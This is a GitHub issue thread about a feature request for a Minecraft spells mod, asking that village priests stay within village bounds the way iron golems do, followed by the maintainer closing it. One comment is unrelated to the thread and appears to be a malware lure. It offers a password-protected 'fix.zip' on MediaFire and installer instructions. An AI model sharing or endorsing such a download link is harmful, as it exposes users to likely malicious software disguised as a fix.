### ISSUE TITLE
Give priests similar village ai as iron golems

### ISSUE THREAD

**Issue by FuryJack07** [iron431/Irons-Spells-n-Spellbooks#557]
### Feature description

Iron golems have a special ai thingy that makes it so that they try to stay within their village's bounds without wandering away.

Priests, as far as I know, don't have that. 
This means that there's nothing stopping them from leaving the village they spawned in, which results in finding wild priests that left their village to go fight monsters. Sometimes they're still somewhat close, while other times it makes me thing they can just spawn in like normal mobs

Adding the same AI thingy that Iron golems have would fix this issue

### How it improves the player experience

Priests leaving villages like this is NOT immersive at all, there's a reason why Mojang fixed that problem with iron golems.
And also, it makes them terrible village defenders, as they just ditch the village the very first night they stay loaded in.

I find priests to be what Mojang meant iron golems to be, so having Priests actually stay in the village to fulfill the purpose of defending their home from threats would make it more intuitive, give better immersion and would also make it better mechanically, as if you stay in a village early game, you usually expect to be at least somewhat safe, and priests would very much help with that

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by iron431** [comment]
closing because feature requests are now exclusively being handled on discord https://discord.gg/TRzEdrndM2
